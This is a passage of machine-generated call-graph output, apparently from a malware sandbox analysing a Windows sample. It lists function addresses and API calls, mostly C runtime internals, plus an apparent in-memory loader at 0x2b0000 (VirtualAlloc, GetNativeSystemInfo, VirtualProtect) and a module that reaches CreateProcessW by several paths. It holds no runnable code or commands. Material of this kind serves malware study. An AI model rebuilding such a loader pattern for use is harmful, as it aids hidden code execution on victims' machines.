7fef9d30ad0 16719->16721 16720->16703 16723 7fef9d30add WriteFile 16721->16723 16723->16703 16725 7fef9d38cd3 16724->16725 16726 7fef9d38ca6 16724->16726 16728 7fef9d38d00 _itow_s 17 API calls 16725->16728 16726->16725 16727 7fef9d38cad 16726->16727 16787 7fef9d38d00 16727->16787 16730 7fef9d30251 16728->16730 16730->16659 16803 7fef9d386b0 16731->16803 16733 7fef9d38c74 16733->16678 16735 7fef9d31661 16734->16735 16736 7fef9d316c2 16735->16736 16738 7fef9d31700 _calloc_dbg_impl 16735->16738 16737 7fef9d2bd70 _invalid_parameter 17 API calls 16736->16737 16740 7fef9d316f6 _calloc_dbg_impl 16737->16740 16739 7fef9d317f4 16738->16739 16742 7fef9d31832 _calloc_dbg_impl 16738->16742 16741 7fef9d2bd70 _invalid_parameter 17 API calls 16739->16741 16740->16687 16741->16740 16742->16740 16743 7fef9d2bd70 _invalid_parameter 17 API calls 16742->16743 16743->16740 16745 7fef9d32da1 16744->16745 16746 7fef9d32e02 16745->16746 16748 7fef9d32e40 _calloc_dbg_impl 16745->16748 16747 7fef9d2bd70 _invalid_parameter 17 API calls 16746->16747 16752 7fef9d32e36 _calloc_dbg_impl 16747->16752 16749 7fef9d32f34 16748->16749 16750 7fef9d32f72 _calloc_dbg_impl 16748->16750 16753 7fef9d2bd70 _invalid_parameter 17 API calls 16749->16753 16751 7fef9d330b5 16750->16751 16754 7fef9d330f3 _calloc_dbg_impl 16750->16754 16755 7fef9d2bd70 _invalid_parameter 17 API calls 16751->16755 16752->16663 16753->16752 16754->16752 16756 7fef9d2bd70 _invalid_parameter 17 API calls 16754->16756 16755->16752 16756->16752 16758 7fef9d386b0 _snwprintf_s 17 API calls 16757->16758 16759 7fef9d315de 16758->16759 16759->16690 16760->16702 16762 7fef9d2b48d 16761->16762 16763 7fef9d2b4ce GetModuleFileNameW 16762->16763 16764 7fef9d2b4c4 16762->16764 16765 7fef9d2b4f2 16763->16765 16770 7fef9d2b538 16763->16770 16766 7fef9d23280 __GSHandlerCheck 8 API calls 16764->16766 16767 7fef9d31640 17 API calls 16765->16767 16768 7fef9d2ba58 16766->16768 16769 7fef9d2b50b 16767->16769 16768->16677 16771 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16769->16771 16775 7fef9d2b5f2 16770->16775 16825 7fef9d30fd0 16770->16825 16771->16770 16773 7fef9d2b5c5 16774 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16773->16774 16774->16775 16776 7fef9d31590 _snwprintf_s 17 API calls 16775->16776 16777 7fef9d2b940 16776->16777 16778 7fef9d2b998 16777->16778 16779 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16777->16779 16780 7fef9d31640 17 API calls 16778->16780 16783 7fef9d2b9f6 16778->16783 16779->16778 16781 7fef9d2b9c9 16780->16781 16782 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16781->16782 16782->16783 16783->16764 16835 7fef9d2cff0 16783->16835 16788 7fef9d38d25 16787->16788 16789 7fef9d38d7b 16788->16789 16790 7fef9d38db9 16788->16790 16791 7fef9d2bd70 _invalid_parameter 17 API calls 16789->16791 16792 7fef9d38e1a 16790->16792 16796 7fef9d38e58 _calloc_dbg_impl 16790->16796 16800 7fef9d38daf 16791->16800 16793 7fef9d2bd70 _invalid_parameter 17 API calls 16792->16793 16793->16800 16794 7fef9d38f9b 16798 7fef9d3900e 16794->16798 16801 7fef9d3904c 16794->16801 16795 7fef9d38f5d 16797 7fef9d2bd70 _invalid_parameter 17 API calls 16795->16797 16796->16794 16796->16795 16797->16800 16799 7fef9d2bd70 _invalid_parameter 17 API calls 16798->16799 16799->16800 16800->16730 16801->16800 16802 7fef9d2bd70 _invalid_parameter 17 API calls 16801->16802 16802->16800 16804 7fef9d386e6 16803->16804 16805 7fef9d3873c 16804->16805 16807 7fef9d3877a 16804->16807 16806 7fef9d2bd70 _invalid_parameter 17 API calls 16805->16806 16815 7fef9d38770 _calloc_dbg_impl 16806->16815 16808 7fef9d3880e 16807->16808 16809 7fef9d3884c 16807->16809 16807->16815 16812 7fef9d2bd70 _invalid_parameter 17 API calls 16808->16812 16810 7fef9d38992 16809->16810 16811 7fef9d38862 16809->16811 16814 7fef9d38350 _snwprintf_s 17 API calls 16810->16814 16818 7fef9d38350 16811->16818 16812->16815 16816 7fef9d388b1 _calloc_dbg_impl 16814->16816 16815->16733 16816->16815 16817 7fef9d2bd70 _invalid_parameter 17 API calls 16816->16817 16817->16815 16820 7fef9d3839b 16818->16820 16819 7fef9d383f1 16821 7fef9d2bd70 _invalid_parameter 17 API calls 16819->16821 16820->16819 16822 7fef9d3842f 16820->16822 16824 7fef9d38425 16821->16824 16823 7fef9d2bd70 _invalid_parameter 17 API calls 16822->16823 16822->16824 16823->16824 16824->16816 16826 7fef9d30ff7 16825->16826 16828 7fef9d30ff0 __SehTransFilter 16825->16828 16827 7fef9d31055 16826->16827 16830 7fef9d31093 _calloc_dbg_impl 16826->16830 16829 7fef9d2bd70 _invalid_parameter 17 API calls 16827->16829 16828->16773 16829->16828 16830->16828 16831 7fef9d3111a 16830->16831 16833 7fef9d31158 16830->16833 16832 7fef9d2bd70 _invalid_parameter 17 API calls 16831->16832 16832->16828 16833->16828 16834 7fef9d2bd70 _invalid_parameter 17 API calls 16833->16834 16834->16828 16837 7fef9d2d02a 16835->16837 16836 7fef9d2d1d8 DecodePointer 16838 7fef9d2d1e8 16836->16838 16837->16836 16840 7fef9d2bd70 _invalid_parameter 17 API calls 16837->16840 16839 7fef9d2ba2b 16838->16839 16842 7fef9d27090 _exit 33 API calls 16838->16842 16843 7fef9d2d209 16838->16843 16847 7fef9d27090 16839->16847 16841 7fef9d2d1ce 16840->16841 16841->16836 16841->16839 16842->16843 16845 7fef9d2d289 16843->16845 16850 7fef9d23d00 RtlEncodePointer 16843->16850 16845->16839 16851 7fef9d29360 LeaveCriticalSection 16845->16851 16848 7fef9d27280 _exit 33 API calls 16847->16848 16849 7fef9d270a9 16848->16849 16849->16764 16850->16845 16851->16839 16852 7fef9d2ae14 16853 7fef9d2b390 16852->16853 16854 7fef9d23280 __GSHandlerCheck 8 API calls 16853->16854 16855 7fef9d2b3a0 16854->16855 16856 7fef9d32c10 16857 7fef9d32c53 16856->16857 16858 7fef9d32c24 _updatetlocinfoEx_nolock 16856->16858 16860 7fef9d29360 LeaveCriticalSection 16858->16860 16860->16857 16861 7fef9d3d410 16866 7fef9d3d3e0 16861->16866 16864 7fef9d3d43c 16873 7fef9d40070 16866->16873 16869 7fef9d3d710 16870 7fef9d3d721 16869->16870 16871 7fef9d3d726 16869->16871 16870->16864 16878 7fef9d29360 LeaveCriticalSection 16871->16878 16876 7fef9d40083 _free_nolock 16873->16876 16875 7fef9d3d402 16875->16864 16875->16869 16877 7fef9d29360 LeaveCriticalSection 16876->16877 16877->16875 16878->16870 16456 1800010e8 16459 18001dbfc 16456->16459 16458 180001151 16464 18001dc49 16459->16464 16460 18001f803 16471 18002191c 16460->16471 16463 18001f7d8 16463->16458 16464->16460 16464->16463 16465 1800171b8 16464->16465 16468 1800171da 16465->16468 16469 18001752f 16468->16469 16475 18000d12c 16468->16475 16479 180005e7c 16468->16479 16483 180019af0 16468->16483 16469->16464 16474 180021941 16471->16474 16472 18000c85c CreateProcessW 16473 180021f5a 16472->16473 16473->16463 16474->16472 16474->16473 16478 18000d176 16475->16478 16477 18000db07 16477->16468 16478->16477 16487 18000c85c 16478->16487 16482 180005eb1 16479->16482 16480 18000c85c CreateProcessW 16480->16482 16481 1800064ba 16481->16468 16482->16480 16482->16481 16486 180019b56 16483->16486 16484 18001aa27 16484->16468 16485 18000c85c CreateProcessW 16485->16486 16486->16484 16486->16485 16488 18000c8c2 16487->16488 16491 1800178a8 16488->16491 16490 18000ca47 16490->16477 16493 180017939 16491->16493 16492 180017a02 CreateProcessW 16492->16490 16493->16492 16879 7fef9d27816 16880 7fef9d27826 _calloc_dbg 16879->16880 16883 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16880->16883 16884 7fef9d27a19 GetFileType 16880->16884 16885 7fef9d27ab9 16880->16885 16881 7fef9d27ce0 SetHandleCount 16882 7fef9d27aaf 16881->16882 16883->16882 16883->16885 16884->16883 16884->16885 16885->16881 16886 7fef9d27b95 GetStdHandle 16885->16886 16887 7fef9d27c7b 16885->16887 16886->16887 16888 7fef9d27bb9 16886->16888 16887->16881 16888->16887 16889 7fef9d27bc8 GetFileType 16888->16889 16889->16887 16890 7fef9d27beb InitializeCriticalSectionAndSpinCount 16889->16890 16890->16882 16890->16887 16516 7fef9d2461b 16519 7fef9d24625 _calloc_dbg_impl 16516->16519 16518 7fef9d248be 16520 7fef9d29360 LeaveCriticalSection 16519->16520 16520->16518 16898 7fef9d36203 16899 7fef9d3616e _CrtMemDumpAllObjectsSince wcsxfrm 16898->16899 16900 7fef9d36238 MultiByteToWideChar 16899->16900 16901 7fef9d361c8 _LocaleUpdate::~_LocaleUpdate 16899->16901 16900->16901 16902 7fef9d40204 16904 7fef9d4023d 16902->16904 16903 7fef9d403d7 16904->16903 16906 7fef9d40326 16904->16906 16908 7fef9d3ab10 16904->16908 16906->16903 16912 7fef9d39290 16906->16912 16909 7fef9d3ab23 16908->16909 16910 7fef9d3ab35 16908->16910 16909->16906 16910->16909 16911 7fef9d2bd70 _invalid_parameter 17 API calls 16910->16911 16911->16909 16913 7fef9d392d8 16912->16913 16914 7fef9d392b6 __doserrno 16912->16914 16915 7fef9d39341 __doserrno 16913->16915 16919 7fef9d3938c 16913->16919 16914->16903 16917 7fef9d2bd70 _invalid_parameter 17 API calls 16915->16917 16916 7fef9d3945b 16926 7fef9d3fae0 16916->16926 16917->16914 16919->16916 16921 7fef9d39410 __doserrno 16919->16921 16923 7fef9d2bd70 _invalid_parameter 17 API calls 16921->16923 16923->16914 16924 7fef9d394a6 __doserrno 16940 7fef9d3fbc0 LeaveCriticalSection 16924->16940 16927 7fef9d3fb25 16926->16927 16928 7fef9d3fb7a 16926->16928 16931 7fef9d3fb56 16927->16931 16932 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16927->16932 16929 7fef9d39464 16928->16929 16930 7fef9d3fb81 EnterCriticalSection 16928->16930 16929->16924 16934 7fef9d39520 16929->16934 16930->16929 16941 7fef9d29360 LeaveCriticalSection 16931->16941 16932->16931 16942 7fef9d3f900 16934->16942 16936 7fef9d39545 16937 7fef9d3959d SetFilePointer 16936->16937 16939 7fef9d39552 _dosmaperr 16936->16939 16938 7fef9d395c1 GetLastError 16937->16938 16937->16939 16938->16939 16939->16924 16940->16914 16941->16928 16943 7fef9d3f935 16942->16943 16945 7fef9d3f913 __doserrno 16942->16945 16944 7fef9d3f99e __doserrno 16943->16944 16947 7fef9d3f9e9 __doserrno 16943->16947 16946 7fef9d2bd70 _invalid_parameter 17 API calls 16944->16946 16945->16936 16946->16945 16947->16945 16948 7fef9d2bd70 _invalid_parameter 17 API calls 16947->16948 16948->16945 16949 7fef9d41200 16952 7fef9d2ed30 16949->16952 16951 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16953 7fef9d2ed3e 16952->16953 16955 7fef9d2ed4c 16953->16955 16958 7fef9d2cf80 DecodePointer 16953->16958 16956 7fef9d2cf80 _inconsistency 36 API calls 16955->16956 16957 7fef9d2ed88 16955->16957 16956->16957 16957->16951 16959 7fef9d2cf9e 16958->16959 16962 7fef9d2cf50 16959->16962 16964 7fef9d2cf59 16962->16964 16966 7fef9d339e0 16964->16966 16967 7fef9d339fa 16966->16967 16976 7fef9d2d430 DecodePointer 16967->16976 16969 7fef9d33a09 16970 7fef9d33a20 16969->16970 16971 7fef9d2cff0 terminate 34 API calls 16969->16971 16972 7fef9d33a42 16970->16972 16973 7fef9d2be50 _invoke_watson_if_oneof 14 API calls 16970->16973 16971->16970 16974 7fef9d27090 _exit 33 API calls 16972->16974 16973->16972 16975 7fef9d2cf78 16974->16975 16975->16955 16976->16969 16982 7fef9d23409 16983 7fef9d23e00 3 API calls 16982->16983 16984 7fef9d2340e 16983->16984 16987 7fef9d288d0 HeapDestroy 16984->16987 16986 7fef9d23413 16987->16986 18150 7fef9d23909 18151 7fef9d23913 __SehTransFilter 18150->18151 18152 7fef9d239db __SehTransFilter 18151->18152 18153 7fef9d23a71 RtlUnwindEx 18151->18153 18153->18152 18177 7fef9d3c30d 18178 7fef9d3c31a get_int64_arg _get_printf_count_output 18177->18178 18179 7fef9d3c39d 18178->18179 18190 7fef9d3c3f2 18178->18190 18180 7fef9d2bd70 _invalid_parameter 17 API calls 18179->18180 18181 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18180->18181 18183 7fef9d23280 __GSHandlerCheck 8 API calls 18181->18183 18182 7fef9d3b99c 18185 7fef9d3cc93 18182->18185 18188 7fef9d3bada 18182->18188 18184 7fef9d3cd90 18183->18184 18185->18181 18187 7fef9d2bd70 _invalid_parameter 17 API calls 18185->18187 18186 7fef9d3b530 wctomb_s 19 API calls 18186->18190 18187->18181 18189 7fef9d2bd70 _invalid_parameter 17 API calls 18188->18189 18189->18181 18190->18182 18190->18186 16393 7fef9d23d30 16411 7fef9d27540 16393->16411 16398 7fef9d23d4e FlsAlloc 16401 7fef9d23d73 _calloc_dbg 16398->16401 16402 7fef9d23d6a 16398->16402 16399 7fef9d23d42 16400 7fef9d23e00 3 API calls 16399->16400 16403 7fef9d23d47 16400->16403 16405 7fef9d23da4 FlsSetValue 16401->16405 16406 7fef9d23db9 16401->16406 16404 7fef9d23e00 3 API calls 16402->16404 16404->16403 16405->16406 16407 7fef9d23dc2 16405->16407 16408 7fef9d23e00 3 API calls 16406->16408 16420 7fef9d23e30 16407->16420 16408->16403 16426 7fef9d23d00 RtlEncodePointer 16411->16426 16413 7fef9d27549 _initp_misc_winsig 16427 7fef9d2cf20 EncodePointer 16413->16427 16415 7fef9d23d39 16416 7fef9d28fe0 16415->16416 16418 7fef9d28ff6 16416->16418 16417 7fef9d23d3e 16417->16398 16417->16399 16418->16417 16419 7fef9d29022 InitializeCriticalSectionAndSpinCount 16418->16419 16419->16417 16419->16418 16421 7fef9d23ead 16420->16421 16428 7fef9d29360 LeaveCriticalSection 16421->16428 16423 7fef9d23ec7 _updatetlocinfoEx_nolock 16429 7fef9d29360 LeaveCriticalSection 16423->16429 16425 7fef9d23dce GetCurrentThreadId 16425->16403 16426->16413 16427->16415 16428->16423 16429->16425 16997 7fef9d2e830 16998 7fef9d2e857 16997->16998 17001 7fef9d33cc0 16998->17001 17002 7fef9d33cdd 17001->17002 17004 7fef9d33d82 17002->17004 17005 7fef9d33ef3 __SehTransFilter 17002->17005 17016 7fef9d2e8e3 17002->17016 17006 7fef9d33dc8 17004->17006 17010 7fef9d33e40 17004->17010 17004->17016 17005->17016 17039 7fef9d340b0 17005->17039 17019 7fef9d33a60 17006->17019 17011 7fef9d2cf80 _inconsistency 36 API calls 17010->17011 17014 7fef9d33e93 17010->17014 17017 7fef9d33ebd 17010->17017 17011->17014 17012 7fef9d33e08 17025 7fef9d34f20 17012->17025 17013 7fef9d2cf80 _inconsistency 36 API calls 17013->17012 17015 7fef9d34f20 __SehTransFilter 36 API calls 17014->17015 17015->17017 17017->17016 17032 7fef9d2e790 17017->17032 17020 7fef9d33a7b 17019->17020 17021 7fef9d33a7d 17019->17021 17023 7fef9d2cf80 _inconsistency 36 API calls 17020->17023 17024 7fef9d33aa5 17020->17024 17022 7fef9d2cf80 _inconsistency 36 API calls 17021->17022 17022->17020 17023->17024 17024->17012 17024->17013 17084 7fef9d33b70 17025->17084 17027 7fef9d2cf80 _inconsistency 36 API calls 17031 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 17027->17031 17028 7fef9d35103 17029 7fef9d3514a __SetState 17028->17029 17030 7fef9d2cf80 _inconsistency 36 API calls 17028->17030 17029->17016 17030->17029 17031->17027 17031->17028 17091 7fef9d2e500 17032->17091 17035 7fef9d33b40 __StateFromControlPc 36 API calls 17036 7fef9d2e7d0 __SehTransFilter 17035->17036 17037 7fef9d34f20 __SehTransFilter 36 API calls 17036->17037 17038 7fef9d2e81e 17037->17038 17038->17016 17040 7fef9d33b40 __StateFromControlPc 36 API calls 17039->17040 17041 7fef9d340ea 17040->17041 17042 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17041->17042 17043 7fef9d34110 17042->17043 17096 7fef9d33c70 17043->17096 17046 7fef9d34133 __SetState 17099 7fef9d33c00 17046->17099 17047 7fef9d34176 17048 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17047->17048 17049 7fef9d34174 17048->17049 17051 7fef9d2cf80 _inconsistency 36 API calls 17049->17051 17052 7fef9d341af _ValidateRead _SetThrowImageBase 17049->17052 17051->17052 17054 7fef9d34347 17052->17054 17061 7fef9d34235 17052->17061 17069 7fef9d2cf80 _inconsistency 36 API calls 17052->17069 17071 7fef9d3428e 17052->17071 17053 7fef9d347d9 17055 7fef9d347f3 17053->17055 17056 7fef9d34847 17053->17056 17062 7fef9d347d7 17053->17062 17054->17053 17057 7fef9d343f5 17054->17057 17129 7fef9d34960 17055->17129 17059 7fef9d2cf50 terminate 35 API calls 17056->17059 17064 7fef9d3466c __SehTransFilter 17057->17064 17114 7fef9d2ea30 17057->17114 17059->17062 17061->17016 17062->17061 17063 7fef9d2cf80 _inconsistency 36 API calls 17062->17063 17063->17061 17064->17062 17065 7fef9d35bb0 __SehTransFilter 36 API calls 17064->17065 17066 7fef9d34727 17065->17066 17066->17062 17067 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17066->17067 17068 7fef9d34767 17067->17068 17126 7fef9d2edc0 RtlUnwindEx 17068->17126 17069->17071 17072 7fef9d2cf80 _inconsistency 36 API calls 17071->17072 17073 7fef9d342fa 17071->17073 17072->17073 17073->17054 17102 7fef9d35bb0 17073->17102 17074 7fef9d34450 __SehTransFilter 17074->17064 17119 7fef9d35180 17074->17119 17077 7fef9d34340 __SehTransFilter 17077->17054 17078 7fef9d34393 17077->17078 17079 7fef9d3435a __SehTransFilter 17077->17079 17080 7fef9d2cf50 terminate 35 API calls 17078->17080 17108 7fef9d34870 17079->17108 17080->17054 17085 7fef9d33b9a 17084->17085 17086 7fef9d33ba9 17084->17086 17088 7fef9d33b40 17085->17088 17086->17031 17089 7fef9d33a60 __StateFromControlPc 36 API calls 17088->17089 17090 7fef9d33b65 17089->17090 17090->17086 17092 7fef9d33b40 __StateFromControlPc 36 API calls 17091->17092 17094 7fef9d2e539 17092->17094 17093 7fef9d2e601 17093->17035 17094->17093 17095 7fef9d2e5c2 RtlLookupFunctionEntry 17094->17095 17095->17093 17097 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17096->17097 17098 7fef9d33c9c 17097->17098 17098->17046 17098->17047 17100 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17099->17100 17101 7fef9d33c31 17100->17101 17101->17049 17103 7fef9d35bc6 17102->17103 17104 7fef9d35bc8 17102->17104 17106 7fef9d2cf50 terminate 35 API calls 17103->17106 17107 7fef9d35bda __SehTransFilter 17103->17107 17105 7fef9d2cf80 _inconsistency 36 API calls 17104->17105 17105->17103 17106->17107 17107->17077 17139 7fef9d3d4e0 17108->17139 17111 7fef9d3d320 17112 7fef9d3d375 17111->17112 17113 7fef9d3d3ba RaiseException 17112->17113 17113->17054 17115 7fef9d33b40 __StateFromControlPc 36 API calls 17114->17115 17116 7fef9d2ea6f 17115->17116 17117 7fef9d2cf80 _inconsistency 36 API calls 17116->17117 17118 7fef9d2ea7a 17116->17118 17117->17118 17118->17074 17120 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17119->17120 17121 7fef9d351c1 17120->17121 17122 7fef9d351f0 __SehTransFilter 17121->17122 17146 7fef9d35970 17121->17146 17124 7fef9d2edc0 __SehTransFilter 9 API calls 17122->17124 17125 7fef9d35259 17124->17125 17125->17074 17127 7fef9d23280 __GSHandlerCheck 8 API calls 17126->17127 17128 7fef9d2eee7 17127->17128 17128->17062 17131 7fef9d34990 17129->17131 17136 7fef9d3498b 17129->17136 17130 7fef9d349b2 __SehTransFilter 17132 7fef9d34a41 17130->17132 17133 7fef9d2cf80 _inconsistency 36 API calls 17130->17133 17130->17136 17131->17130 17163 7fef9d23d00 RtlEncodePointer 17131->17163 17134 7fef9d2ea30 __SehTransFilter 36 API calls 17132->17134 17133->17132 17137 7fef9d34a8e __SehTransFilter 17134->17137 17136->17062 17137->17136 17138 7fef9d35180 __SehTransFilter 38 API calls 17137->17138 17138->17136 17142 7fef9d3d660 17139->17142 17143 7fef9d3437d 17142->17143 17144 7fef9d3d676 std::exception::_Copy_str malloc 17142->17144 17143->17111 17144->17143 17145 7fef9d2d490 std::exception::_Copy_str 17 API calls 17144->17145 17145->17143 17147 7fef9d35998 17146->17147 17150 7fef9d355f0 17147->17150 17149 7fef9d359d3 __SehTransFilter __AdjustPointer 17149->17122 17151 7fef9d3561e __SehTransFilter 17150->17151 17152 7fef9d35765 17151->17152 17153 7fef9d356fa _ValidateRead 17151->17153 17160 7fef9d356aa __SehTransFilter __AdjustPointer 17151->17160 17154 7fef9d35813 __SehTransFilter 17152->17154 17158 7fef9d3577a _ValidateRead 17152->17158 17157 7fef9d2cf80 _inconsistency 36 API calls 17153->17157 17153->17160 17155 7fef9d3584d _ValidateRead 17154->17155 17156 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17154->17156 17155->17160 17162 7fef9d2cf80 _inconsistency 36 API calls 17155->17162 17156->17160 17161 7fef9d2cf80 _inconsistency 36 API calls 17156->17161 17157->17160 17159 7fef9d2cf80 _inconsistency 36 API calls 17158->17159 17158->17160 17159->17160 17160->17149 17161->17160 17162->17160 17163->17130 18191 7fef9d23130 18192 7fef9d23170 __GSHandlerCheck 8 API calls 18191->18192 18193 7fef9d23160 18192->18193 17164 7fef9d3c435 17165 7fef9d3c479 _CrtMemDumpAllObjectsSince 17164->17165 17166 7fef9d3c598 DecodePointer 17165->17166 17167 7fef9d3c60d _CrtMemDumpAllObjectsSince 17166->17167 17168 7fef9d3c62b DecodePointer 17167->17168 17169 7fef9d3c652 _CrtMemDumpAllObjectsSince 17167->17169 17168->17169 17170 7fef9d3c676 DecodePointer 17169->17170 17180 7fef9d3c69d std::exception::_Copy_str 17169->17180 17170->17180 17171 7fef9d3b99c 17172 7fef9d3cc93 17171->17172 17177 7fef9d3bada 17171->17177 17174 7fef9d2bd70 _invalid_parameter 17 API calls 17172->17174 17175 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17172->17175 17174->17175 17176 7fef9d23280 __GSHandlerCheck 8 API calls 17175->17176 17178 7fef9d3cd90 17176->17178 17179 7fef9d2bd70 _invalid_parameter 17 API calls 17177->17179 17179->17175 17180->17171 17181 7fef9d3b530 17180->17181 17184 7fef9d3b090 17181->17184 17183 7fef9d3b56c 17183->17180 17185 7fef9d3b0b7 17184->17185 17186 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17185->17186 17187 7fef9d3b168 17185->17187 17193 7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17185->17193 17189 7fef9d3b347 _CrtMemDumpAllObjectsSince 17186->17189 17194 7fef9d3b1cf 17186->17194 17188 7fef9d2bd70 _invalid_parameter 17 API calls 17187->17188 17188->17193 17190 7fef9d3b359 WideCharToMultiByte 17189->17190 17191 7fef9d3b3ab 17190->17191 17192 7fef9d3b3c1 GetLastError 17191->17192 17191->17193 17192->17193 17196 7fef9d3b3d0 _calloc_dbg_impl 17192->17196 17193->17183 17194->17193 17195 7fef9d2bd70 _invalid_parameter 17 API calls 17194->17195 17195->17193 17196->17193 17197 7fef9d2bd70 _invalid_parameter 17 API calls 17196->17197 17197->17193 16439 7fef9d23433 16440 7fef9d23437 16439->16440 16446 7fef9d23446 16439->16446 16441 7fef9d27d00 _ioterm DeleteCriticalSection 16440->16441 16442 7fef9d2343c 16441->16442 16443 7fef9d23e00 3 API calls 16442->16443 16444 7fef9d23441 16443->16444 16447 7fef9d288d0 HeapDestroy 16444->16447 16447->16446 17198 7fef9d3d830 17199 7fef9d3d8aa 17198->17199 17200 7fef9d3d926 17199->17200 17201 7fef9d3d97b 17199->17201 17202 7fef9d2bd70 _invalid_parameter 17 API calls 17200->17202 17203 7fef9d3d9ee 17201->17203 17205 7fef9d3da43 17201->17205 17207 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17202->17207 17204 7fef9d2bd70 _invalid_parameter 17 API calls 17203->17204 17204->17207 17209 7fef9d3eca1 17205->17209 17211 7fef9d3dbb5 17205->17211 17206 7fef9d23280 __GSHandlerCheck 8 API calls 17208 7fef9d3ed9e 17206->17208 17207->17206 17209->17207 17210 7fef9d2bd70 _invalid_parameter 17 API calls 17209->17210 17210->17207 17212 7fef9d2bd70 _invalid_parameter 17 API calls 17211->17212 17212->17207 17213 7fef9d26c32 17214 7fef9d26c3c 17213->17214 17215 7fef9d26c7a _CrtMemDumpAllObjectsSince 17214->17215 17216 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17214->17216 17219 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17215->17219 17220 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17215->17220 17217 7fef9d23280 __GSHandlerCheck 8 API calls 17216->17217 17218 7fef9d26e89 17217->17218 17219->17220 17221 7fef9d2c0c0 _swprintf_p 17 API calls 17220->17221 17223 7fef9d26dc7 17221->17223 17222 7fef9d26e12 17223->17222 17224 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17223->17224 17224->17222 17225 7fef9d33e3b 17226 7fef9d33ec7 17225->17226 17227 7fef9d2e790 __SehTransFilter 37 API calls 17226->17227 17228 7fef9d33ee4 17227->17228 16507 2b0000 16508 2b0183 16507->16508 16509 2b043e VirtualAlloc 16508->16509 16513 2b0462 16509->16513 16510 2b0a00 16511 2b0531 GetNativeSystemInfo 16511->16510 16512 2b056d VirtualAlloc 16511->16512 16514 2b058b 16512->16514 16513->16510 16513->16511 16514->16510 16515 2b09d9 VirtualProtect 16514->16515 16515->16514 17229 7fef9d2443c 17230 7fef9d2444c 17229->17230 17233 7fef9d29360 LeaveCriticalSection 17230->17233 17232 7fef9d248be 17233->17232 18218 7fef9d39939 18219 7fef9d39951 __doserrno 18218->18219 18220 7fef9d2bd70 _invalid_parameter 17 API calls 18219->18220 18221 7fef9d399d7 18220->18221 18222 7fef9d23280 __GSHandlerCheck 8 API calls 18221->18222 18223 7fef9d3a9f5 18222->18223 17234 7fef9d3e424 17235 7fef9d3e469 _CrtMemDumpAllObjectsSince 17234->17235 17236 7fef9d3e588 DecodePointer 17235->17236 17237 7fef9d3e5fd _CrtMemDumpAllObjectsSince 17236->17237 17238 7fef9d3e642 _CrtMemDumpAllObjectsSince 17237->17238 17239 7fef9d3e61b DecodePointer 17237->17239 17240 7fef9d3e666 DecodePointer 17238->17240 17241 7fef9d3e68d std::exception::_Copy_str 17238->17241 17239->17238 17240->17241 17242 7fef9d3eadf 17241->17242 17251 7fef9d3da75 17241->17251 17263 7fef9d3eec0 17241->17263 17267 7fef9d3ef10 17242->17267 17245 7fef9d3eafd 17246 7fef9d3eb33 17245->17246 17248 7fef9d3eec0 25 API calls 17245->17248 17247 7fef9d3ec29 17246->17247 17261 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17246->17261 17249 7fef9d3ebda 17247->17249 17250 7fef9d3ef10 25 API calls 17247->17250 17248->17246 17249->17251 17254 7fef9d3eec0 25 API calls 17249->17254 17250->17249 17252 7fef9d3eca1 17251->17252 17257 7fef9d3dbb5 17251->17257 17253 7fef9d2bd70 _invalid_parameter 17 API calls 17252->17253 17255 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17252->17255 17253->17255 17254->17251 17256 7fef9d23280 __GSHandlerCheck 8 API calls 17255->17256 17258 7fef9d3ed9e 17256->17258 17260 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17260 17260->17255 17261->17249 17271 7fef9d3f000 17261->17271 17278 7fef9d3ee40 17261->17278 17264 7fef9d3eed7 17263->17264 17265 7fef9d3ef07 17264->17265 17266 7fef9d3ee40 25 API calls 17264->17266 17265->17242 17266->17264 17269 7fef9d3ef2c 17267->17269 17268 7fef9d3ef4d 17268->17245 17269->17268 17270 7fef9d3ee40 25 API calls 17269->17270 17270->17269 17272 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17271->17272 17275 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17271->17275 17273 7fef9d3f276 _CrtMemDumpAllObjectsSince 17272->17273 17272->17275 17276 7fef9d3f146 _CrtMemDumpAllObjectsSince 17272->17276 17274 7fef9d3f29d MultiByteToWideChar 17273->17274 17274->17275 17275->17261 17276->17275 17277 7fef9d3f1b5 MultiByteToWideChar 17276->17277 17277->17275 17279 7fef9d3ee62 17278->17279 17281 7fef9d3ee6e 17279->17281 17282 7fef9d3f360 17279->17282 17281->17261 17283 7fef9d3f719 17282->17283 17284 7fef9d3f399 17282->17284 17287 7fef9d40170 23 API calls 17283->17287 17317 7fef9d3f4f2 17283->17317 17318 7fef9d3afb0 17284->17318 17287->17317 17288 7fef9d23280 __GSHandlerCheck 8 API calls 17290 7fef9d3f7c5 17288->17290 17289 7fef9d3f3ed 17293 7fef9d3f4c7 17289->17293 17294 7fef9d3afb0 _fflush_nolock 17 API calls 17289->17294 17290->17281 17291 7fef9d3afb0 _fflush_nolock 17 API calls 17292 7fef9d3f3b8 17291->17292 17292->17289 17295 7fef9d3afb0 _fflush_nolock 17 API calls 17292->17295 17293->17317 17322 7fef9d40170 17293->17322 17297 7fef9d3f43d 